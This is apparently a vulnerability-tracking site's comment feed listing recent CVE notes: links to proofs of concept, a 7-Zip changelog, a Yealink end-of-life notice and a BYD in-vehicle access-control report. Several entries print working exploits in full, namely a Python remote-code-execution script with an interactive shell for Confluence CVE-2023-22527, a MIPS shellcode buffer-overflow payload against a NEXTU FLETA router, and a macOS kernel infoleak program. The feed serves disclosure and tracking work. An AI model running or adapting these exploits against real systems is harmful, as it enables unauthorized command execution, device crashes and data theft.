https://vulnerability.circl.lu/comments/feed Most recent comment. 2025-02-09T21:14:28.619150+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent comments. https://vulnerability.circl.lu/comment/714ff721-cfd1-4d52-8dd7-18df34e59ed5 CVE-2023-4047 PoC By Wild Pointer 2025-02-09T21:14:28.626944+00:00 Alexandre Dulaunoy http://vulnerability.circl.lu/user/adulau - [https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC) 2025-01-17T21:26:39.418096+00:00 https://vulnerability.circl.lu/comment/a58dda1d-0763-4d89-ad38-22d86eb55d6a POC for CVE-2023-22527 (Confluence SSTI) - Struts2 2025-02-09T21:14:28.626857+00:00 Alexandre Dulaunoy http://vulnerability.circl.lu/user/adulau ~~~python import requests import argparse class exploit: def __init__(self, url): self.url = url def rce(self, cmd='', header='Ret-rce'): data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameter s.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\ n' r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = { 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': str(len(data)) } ) return r.text.split('<!DOCTYPE html>')[0].strip() def get_env(self): return self.rce(cmd='env') def shell(self): print('[DEBUG] Spawning semi-interactive shell ..') while 1: cmd = input('$ ') result = self.rce(cmd) print(result) def parse_args(): parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)') parser.add_argument("-u",dest="url",type=str,required=False, help="Url") parser.add_argument("-c",dest="command",type=str,required=False, default=None,help="Command") parser.add_argument("-e",dest="env",action="store_true",required=False,default=False, help="Get environnement vars") parser.add_argument("-i",dest="interactive",action="store_true",required=False,default=False, help="Interactive mod") return parser.parse_args() def main(args): if args.command is None and not args.env and not args.interactive: print('[ERROR] Please provide a command using -c option') exp = exploit(url = args.url) if args.env: res = exp.get_env() print(res) if args.command: res = exp.rce(args.command) print(res) if args.interactive: exp.shell() if __name__ == '__main__': args = parse_args() main(args = args) ~~~ 2025-01-17T21:29:08.826577+00:00 https://vulnerability.circl.lu/comment/aea0fc6c-fa3d-4e98-aef1-a25b364fb2fe PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit 2025-02-09T21:14:28.626770+00:00 Alexandre Dulaunoy http://vulnerability.circl.lu/user/adulau [Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit](https://github.com/synacktiv/CVE-2024-43468) 2025-01-21T15:32:07.384792+00:00 https://vulnerability.circl.lu/comment/ffe0aeca-4687-4168-a295-b0334927e4c5 7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives 2025-02-09T21:14:28.626679+00:00 Alexandre Dulaunoy http://vulnerability.circl.lu/user/adulau ~~~ 24.09 2024-11-29 ------------------------- - The default dictionary size values for LZMA/LZMA2 compression methods were increased: dictionary size compression level v24.08 v24.09 v24.09 32-bit 64-bit 8 MB 16 MB 16 MB -mx4 16 MB 32 MB 32 MB -mx5 : Normal 32 MB 64 MB 64 MB -mx6 32 MB 64 MB 128 MB -mx7 : Maximum 64 MB 64 MB 256 MB -mx8 64 MB 64 MB 256 MB -mx9 : Ultra The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB. - 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5. - APM and HFS support was improved. - If an archive update operation uses a temporary archive folder and the archive is moved to the destination folder, 7-Zip shows the progress of moving the archive file, as this operation can take a long time if the archive is large. - The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives (if there is open archive inside another open archive). - Some bugs were fixed. ~~~ [https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/](https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/) 2025-01-23T07:14:02.895881+00:00 https://vulnerability.circl.lu/comment/fa8ceb01-4bdc-4f10-8a64-5a1b671dc259 A particularly 'sus' sysctl in the XNU Kernel 2025-02-09T21:14:28.626584+00:00 Cédric Bonhomme http://vulnerability.circl.lu/user/cedric ### Timeline * September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug. * Fall 2024: I reported this bug to Apple. * December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue. 2025-01-24T06:18:07.537395+00:00 https://vulnerability.circl.lu/comment/25c99b1c-5ba6-4c88-bac6-3ad6c5e525b4 Proof Of Concept 2025-02-09T21:14:28.626489+00:00 Cédric Bonhomme http://vulnerability.circl.lu/user/cedric ```c // ravi (@0xjprx) // 2-byte kernel infoleak, introduced in xnu-11215.1.10. // gcc SUSCTL.c -o susctl // ./susctl #include <stdio.h> #include <sys/sysctl.h> void leak() { uint64_t val = 0; size_t len = sizeof(val); sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0); printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF); } int main() { leak(); return 0; } ``` from https://github.com/jprx/CVE-2024-54507 2025-01-24T06:32:36.489951+00:00 https://vulnerability.circl.lu/comment/b66f6073-c25f-43da-a3ab-4d70b3c8933b Yealink informs that the SIP-T46S has been discontinued since 2022-03-31 2025-02-09T21:14:28.626387+00:00 Cédric Bonhomme http://vulnerability.circl.lu/user/cedric """ Dear Customers, Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted. After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service. The general policy guidelines are: (1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes. (2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided. (3) Yealink will not offer any New Features/Enhancements support from the End of Life. (4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process. (5) Since the sixth year from the End of Life, Yealink will not offer any Support. """ 2025-01-24T10:18:50.387271+00:00 https://vulnerability.circl.lu/comment/21f63dda-f998-4c51-b7ce-6efc09015c56 A vulnerability report for BYD (Chinese car maker) 2025-02-09T21:14:28.626257+00:00 Cédric Bonhomme http://vulnerability.circl.lu/user/cedric # Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control **Product:** BYD QIN PLUS DM-i - Dilink OS **Vendor**: https://www.byd.com/ **Version**: 3.0_13.1.7.2204050.1. **Vulnerability Type:** Incorrect Access Control **Attack Vectors**: The user installs and runs an app on the IVI system that only requires normal permissions. ## Introduction ​ The BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through **Attack Path 1**: **System Log Theft** and **Attack Path 2**: **CAN Traffic Hijacking**. ## Attack Path 1 : System Log Theft ​ Incorrect access control in BYD QIN PLUS DM-i Dilink OS 3.0_13.1.7.2204050.1 allows unaithorized attackers to access system logcat logs. ### Description ​ The DiLink 3.0 system’s /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker’s server. This poses a serious security risk, as the data is highly confidential for both users and manufacturers. ### Detailed Steps 1. Check the system-collected and stored system logs. ![log.png](https://s2.loli.net/2025/01/26/MRTCqKnv1aEIpQZ.png) 2. The malicious app copies system files to its own private directory. The main code is as follows: <img src="https://s2.loli.net/2025/01/26/EqxHDSX9O5Ibhr4.png" alt=".png" style="zoom: 50%;" /> 3. The malicious app successfully steals system logs to its private directory. ![.png](https://s2.loli.net/2025/01/26/r7vsY93LgTb6coF.png) 4. Extract the file and search for sensitive confidential information in the system logs. ​ (a) Fuel consumption, energy consumption, and seatbelt status. ![111.png](https://s2.loli.net/2025/01/26/6jkmACTRwxaX7sb.png) ​ (b) ICCID, VIN (Vehicle Identification Number), and model code. ![vin.png](https://s2.loli.net/2025/01/26/nJWl3fq5QKVNuEx.png) ​ (c) Diagnostic command format. ![.png](https://s2.loli.net/2025/01/26/jc3xCTkUd8a4ZF2.png) ​ (d) Various detailed vehicle status information. ![.png](https://s2.loli.net/2025/01/26/lSTFK7thceQJ16b.png) ### **Ethical Considerations** ​ The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in in the latest versions, with the logs now encrypted. ### Additional Notes ​ Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe. ### Disclaimer ​ This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided. ## Attack Path 2 : CAN Traffic Hijacking ​ The attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status. ### Description ​ In the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. The "com.byd.data_collection_notify" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to: 1. Set the upload URL to null, preventing cloud data collection. 2. Set the upload URL to an attacker’s domain for remote CAN traffic collection. ​ Additionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status. ### Detailed Steps 1. The vulnerability code for the broadcast handling in CanDataCollect.apk. <img src="https://s2.loli.net/2025/01/26/RanvVwJZYUuq9i8.png" alt=".png" style="zoom:50%;" /> 2. The exploitation code for the malicious app vulnerability. <img src="https://s2.loli.net/2025/01/26/QBC8cxEkKtuY5XT.png" alt=".png" style="zoom:50%;" /> 3. The malicious app successfully modifies the uploaded CAN traffic URL. ![.png](https://s2.loli.net/2025/01/26/sugvP14iSFrAhHW.png) 4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker’s server. <img src="https://s2.loli.net/2025/01/26/2Cxtc3UvFe9X7pn.png" alt=".png" style="zoom: 50%;" /> 5. The CAN traffic collected by the attacker and the decoded results. <img src="https://s2.loli.net/2025/01/27/YqinPrht6S8CFBW.png" alt=".png" style="zoom:50%;" /> ### **Ethical Considerations** ​ The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions. ### Additional Notes: ​ Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe. ### Disclaimer ​ This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided. 2025-01-26T17:57:50.934368+00:00 https://vulnerability.circl.lu/comment/4479dea7-72fb-4d91-90f4-95ffec3e0310 PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix). 2025-02-09T21:14:28.624992+00:00 Alexandre Dulaunoy http://vulnerability.circl.lu/user/adulau - [PoC Tested on AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).](https://github.com/google/security-research/tree/master/pocs/cpus/entrysign) We've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5. 2025-02-05T07:31:30.100378+00:00 https://vulnerability.circl.lu/comment/8b27e542-2740-435c-9317-55790ef4965b NEXTU FLETA Wifi6 Router DOS, Potential RCE POC 2025-02-09T21:14:28.622922+00:00 Cédric Bonhomme http://vulnerability.circl.lu/user/cedric ```python from pwn import * from hackebds import * def shutdown_shell_code(): context.update(arch='mips', os='linux', bits=32, endian='little') cmd = "/bin/sh" args = ["autoreboot"] asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit() shellcode = asm(asmcode) return shellcode power_off_code = shutdown_shell_code() gap_code = (b'A') * 0x138 # This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow. # For example I fixed address as 0x7f854710 RET_address = (b'\x10\x47\x85\x7f') stack_gap = (b'C') * 0x40 print("power_off_code_length") print(len(power_off_code)) final_code = power_off_code + gap_code + RET_address + stack_gap import socket import ssl # Server Address and Port HOST = '192.168.1.254' PORT = 443 # Create an SSL socket for HTTPS connection context = ssl.create_default_context() context.set_ciphers('HIGH:!DH:!aNULL') context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((HOST, PORT)) as sock: with context.wrap_socket(sock, server_hostname=HOST) as ssock: # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use) # parameter for evade verification send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code # POST request headers headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \ b"Host: " + HOST.encode('utf-8') + b"\r\n" \ b"Content-Type: application/octet-stream\r\n" \ b"Content-Length: " + str(len(send_byte)).encode( 'utf-8') + b"\r\nConnection: close\r\n\r\n" # Send request (combine headers and body) ssock.send(headers + send_byte) # Receive response response = b"" while True: data = ssock.recv(1024) if not data: break response += data #Print response print(response.decode('utf-8')) ``` 2025-02-07T03:41:54.937264+00:00